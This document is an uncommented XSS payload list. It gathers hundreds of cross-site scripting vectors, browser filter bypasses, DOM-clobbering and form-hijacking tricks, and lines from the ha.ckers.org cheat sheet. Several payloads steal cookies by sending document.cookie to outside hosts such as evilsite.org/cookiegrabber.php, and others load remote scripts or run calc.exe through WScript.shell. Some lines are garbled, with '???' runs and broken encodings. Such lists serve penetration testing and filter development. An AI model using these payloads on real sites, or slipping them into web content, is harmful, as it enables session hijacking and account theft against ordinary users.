<script>a="<!--";//</script>alert(1)--></script>
<script>a="<%"//</script>alert(1)//%></script>
<svg><script xlink:href="url(#)"></script></svg>
<base href="mailto://any/<img src="bod#y"></script>
\x3Cscript\x3Ealert(document.domain);\x3C\x2Fscript\x3E
data:text/html<svg/onload=parentNode.parentNode.parentNode[/locatio/.source+/n/.source]='javascript:confirm(4)'//>
<math><XSS href="javascript:alert(location)">xss
<math><mrow href=javascript:alert(1)>XSS</mrow></math>
<input+name=xss+value="%26lt;script>alert%26lpar;1)%26lt;/script>">
<script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>
<script>[{get[alert(1)]()false}]</script>
<script>a = {get[alert`1`](){}}</script>
<svg><a xyz:href=123><text>test</text></svg>
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
)\
<javascript:prompt(document.cookie)>
<javascript:alert('XSS')>
\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:alert('XSS'))
\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
"><script/src=data:,alert(1)%2b"
"><script/src=data:,alert(1)%26sol;%26sol;
</script><script>alert(1)+"
"</script><svg><script>alert(1)+"";
/* RFI STOP */
XSS SECURITY PROBLEMS. COLLECTED BY @0x787373
STANDARD XSS VECTORS:
< script > < / script>
<
<
<
<
<
<<
<<<
"><script>"
<script>alert("XSS")</script>
<<script>alert("XSS");//<</script>
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
";alert('XSS');//
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
<script>alert(document.cookie);</script>
<script>alert(document.cookie);<script>alert
<xss><script>alert('XSS')</script></vulnerable>
<IMG%20SRC='javascript:alert(document.cookie)'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc ript:alert(document.cookie)'>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--"<XSS>=&{()}
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
????????????????????????
TWITTER @xssvector Tweets:
<img language=vbs src=<b onerror=alert#1/1#>
Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'
Reverse 401 basic auth phishing by @jackmasa POC:
document.domain='com' chrome/safari same domain suffix cross-domain trick.
Safari empty location bar bug by @jackmasa POC:
Safari location object pollution tech: by @kinugawamasato
Safari URL spoofing about://mmme.me POC:
Opera URL spoofing vuln data://mmme.me by @jackmasa POC:
Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera
New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F
Opera data:message/rfc822 #XSS by @insertScript
#IE <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>
IE cool expression xss <div id="alert(/@0x6D6172696F/)" style="x:expression(eval)(id)">
Clever webkit xss auditor bypass trick <script?=data:,alert(1)<!-- by @cgvwzq
Bypass IE8 version flash docuemnt object protection by @jackmasa
Bypass IE all version flash docuemnt object protection by @gainover1
Bypass IE9 flash docuemnt object protection by @irsdl
Bypass IE8 flash docuemnt object protection by @irsdl
New XSS vector (#Opera Specific) <sVg><scRipt %00>prompt(/@soaj1664ashar/)????????????????
IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day
<iframe srcdoc='<svg/onload=alert(/@80vul/)>'> #chrome
IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0?//(%000000%0dalert(1)// #IE #0day
new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri
<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox
<script for=_ event=onerror()>alert(/@ma1/)</script><img id=_ src=> #IE
"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato
Components.lookupMethod(self, 'alert')(1) #firefox
external.NavigateAndFind(' ',[],[]) #IE #URLredirect
<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke
<meta http-equiv=refresh content="0 javascript:alert(1)"> #opera
<meta http-equiv=refresh content="?,javascript:alert(1)"> #chrome
<svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox
<svg></ y="><x" onload=alert('@0x6D6172696F')> #svg
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera
URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>? #Chrome #XSS @RSnake
Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa
$=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/) #firefox
Firefox cookie xss: with(document)cookie='~???????????????=?????=?=????n?',write(cookie); by @jackmasa
<svg><script>location=<>javascript&#x3A;alert(1)<!/></script> #Firefox #JustForFun
Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a>
<style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style>
<!-- --!><input value="--><body/onload=`alert(/ @jackmasa /)//`"> #IE #XSS
Input[hidden] XSS <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> target it.
Firefox clipboard-hijack without script and css : http://<img alt="evil/#" width=0 height=0 >
<![<img src=x:x onerror=`alert(/ @jackmasa /)//`]-->
#E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes
#vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =ëAí by @masa141421356
({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')()
No referer : <iframe src="javascript:'<script src=>;</script>'"></iframe>
<svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg>?
#VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]
if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console
<svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar
<![if<iframe/onload=vbs::alert[:]> #IE by @0x6D6172696F, @jackmasa
<svg><script/XL:href= data:;;;base64;;;;,<>?YWx?lc?nQ?oMSk?=> mix! #opera by @jackmasa
<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS
header('Refresh: 0;url=javascript:alert(1)');
<script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::">
<a href="data:text/html,<script>eval(name)</script>" target="alert(' @garethheyes @0x6D6172696F ')">click</a>
#CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style>
#ES #FF for(location of ['javascript:alert(/ff/)']);
#E4X function::['location']='javascript'':alert(/FF/)'
HTML5 entity char <a href="javas	cri
pt:alert(' @garethheyes ')">test</a>
#Firefox <a href="x:alert(1)" id="test">click</a> <script>eval(test'')</script> by @cgvwzq
<div style="color:rgb(''�x:expression(alert(URL=1))"></div> CSS and CSS :P
toUpperCase XSS document.write('<i onclick=alert(1)>asd</i>'.toUpperCase()) by @jackmasa
IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("<iframe src=vbscript:alert(1)>") by @masa141421356
aha <script src=>alert(/IE|Opera/)</script>
Opera bug? <img src=//\ onload=alert(1)>
Use 127.1 no 127.0.0.1 by @jackmasa
IE vector location='vbscript:alert(1)'
#jQuery super less-xss,work in IE: $(URL) 6 chars
#Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap
innerText DOM XSS: innerHTML=innerText
Using IE XSS filter or Chrome xss auditor to block <meta> url redirect.
jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>')
IE all version CSRF vector <img lowsrc=//google.com>
Timing vector <img src=//ixss.sinaapp.com/sleep.php>
Firefox data uri can inherit dom-access. <iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>">
IE9 <script/onload=alert(1)></script>
Webkit and FF <style/onload=alert(1)>
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')
If you want to share your cool vector, please do not hesitate to let me know :)
ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL
New spec:<iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F
#Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes
JSON XSS Tips: /json.cgi?a.html by @hasegawayosuke
JSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr
fl=ss <a href="http://fl.lv">click</a> by @_cweb
<a href="http://www?example?com">click</a> by @_cweb
Firefox link host dom xss https://t.co/aTtzHaaG by @garethheyes
<a href="http://www?example?com ">click</a> by @_cweb
history.pushState([],[],'/xssvector') HTML5 URL spoofing!
Clickjacking with history.forward() and history.back() by @lcamtuf
Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul
XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356
Firefox <img src=javascript:while([{}]);>
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115
Firefox funny vector for(i=0;i<100;) find(); by @garethheyes
IE breaking framebusting vector <script>var location={};</script>
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script>
Firefox <iframe src=view-source://xxxx.com>; with drag and drop
<button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking
Dangling markup injection <img src='//evil by @lcamtuf
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F
DOM clobbering:<form name=location > clobbered location object on IE.
DOM clobbering:<form name=document><image name=body> clobbered document->body
<isindex formaction=javascript:alert(1)> by @jackmasa
Classic IE backtick DOM XSS: <img src="xx:x" alt="``onerror=alert(1)"><script>document.body.innerHTML=''</script>
Firefox <a href="https://4294967298915183000">click</a>=>google by @garethheyes
<a href="data:text/html;base64xoxoxox,<body/onload=alert(1)>">click</a> by @kkotowicz
Opera <a href="data:text/html;base64,PHN2Zy?9vbmxv?YWQ<>>9YWxlc>>>nQoMSk">click</a> variant base64 encode. by @jackmasa
Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88
Webkit and Opera <a href="\/www.google.com/favicon.ico">click</a> by @kkotowicz
FF <a href="//???????">click</a> url trick by @jackmasa
IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat
<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F
<a rel="noreferrer" href="//google.com">click</a> no referrer by @sneak_
FF <img src="jar:!/"> no referrer by @sneak_
No dos expression vector <i style=x:expression(alert(URL=1))> by @jackmasa
<svg><style>*{font-family:'<svg onload=alert(1)>';}</style></svg> by @0x6D6172696F
JSLR( @garethheyes ) challenge result:
@irsdl challenge result:
<body onload='vbs:Set x=CreateObject("Msxml2.XMLHTTP"):x.open"GET",".":x.send:MsgBox(x.responseText)'> Vbscript XHR by @masa141421356
XML Entity XSS by @garethheyes
Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa
<style>@import//evil? >>>steal me!<<< scriptless by @garethheyes
IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke
<xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D
<a href="#" onclick="alert(' ');alert(2 ')">name</a> Classic html entity inject vector
A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript
<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F
JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke
<meta http-equiv="refresh" content="0;url=http://good/[>>>inj];url=http://evil/[<<<inj]"> IE6-7 Inject vector by @kinugawamasato
IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa
Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F
<meta charset=gbk><script>a='x?\';alert(1)//';</script> by @garethheyes
FF <a href="data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >">CLICK</a> by @0x6D6172696F
<noscript><!--</noscript><img src=xx:x onerror=alert(1) --> non-IE
<svg><script xlink:href="data:,alert(1)"> by @0x6D6172696F
Firefox statusline spoofing<math><maction actiontype="statusline#http://google.com" href="//evil">click by LeverOne
<svg><oooooo/oooooooooo/onload=alert(1) > by @jackmasa
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector by @jackmasa
FF <applet code=javascript:alert('sgl')> by @jackmasa
Nice IE DOM XSS: <div id=d><x xmlns="><body onload=alert(1)"><script>d.innerHTML=ëí</script> by LeverOne
<script>RuntimeObject("w*")["window"]["alert"](1);</script> IE a new method get window object! by @s_hskz
<body onload="$})}}}});alert(1);({0:{0:{0:function(){0({"> Chrome crazy vector! by @cgvwzq
IE <!-- `<img/src=xx:xx onerror=alert(1)//--!> by @jackmasa H5SC:
<a href="javascript:alert(1)">click</a> non-IE
<a href="feed:javascript:alert(1)">click</a> Firefox
<link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute! by @shafigullin
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> works on webkit by @garethheyes
????????????????????????
MORE VECTORS:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<font style='color:expression(alert(document.cookie))'>
<img src="javascript:alert('XSS')">
<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]
<body onunload="javascript:alert('XSS');">
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@import'javascript:alert("XSS")';</style>
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("Bonjour !");
<div style="x:expression((window.r==1)?'':eval('r=1;
alert(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<script>var var = 1; alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox("XSS")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out
<br size="&{alert('XSS')}">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a?);
='><script>alert("xss")</script>
<isindex action="javas	cript:alert(1)" type=image>
<script?=">"?="http://yoursite.com/xss.js?69,69"></script>
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
">/XaDoS/><script>alert(document.cookie)</script>
<script> src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
src="http://www.site.com/XSS.js"></script>
"><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript"> alert('X nS nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@import'javascript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
<a <!-- --> href="javascript:alert(-1)">hello</a>
<a href="javascript:alert(-1)"
<a href="javascript:alert%252831337%2529">Hello</a>
<a <!-- href="javascript:alert(31337);">Hello</a>
<img src="http://www.w3schools.com/tags/planets.gif" width="145" height="126" alt="Planets" usemap="#planetmap"><map name="planetmap"><area shape="rect" coords="0,0,145,126" a-=">" href="javascript:alert(-1)"></map>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
" onhover="javascript:alert(-1)"
"><script>alert('test')</script>
????????????????????????
ha.ckers.org / sla.ckers.org
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert("XSS")>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://ha.ckers.org/
scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("**");
xss:ex/*XSS*//**pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD><SCRIPT>alert('XSS');</SCRIPT>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
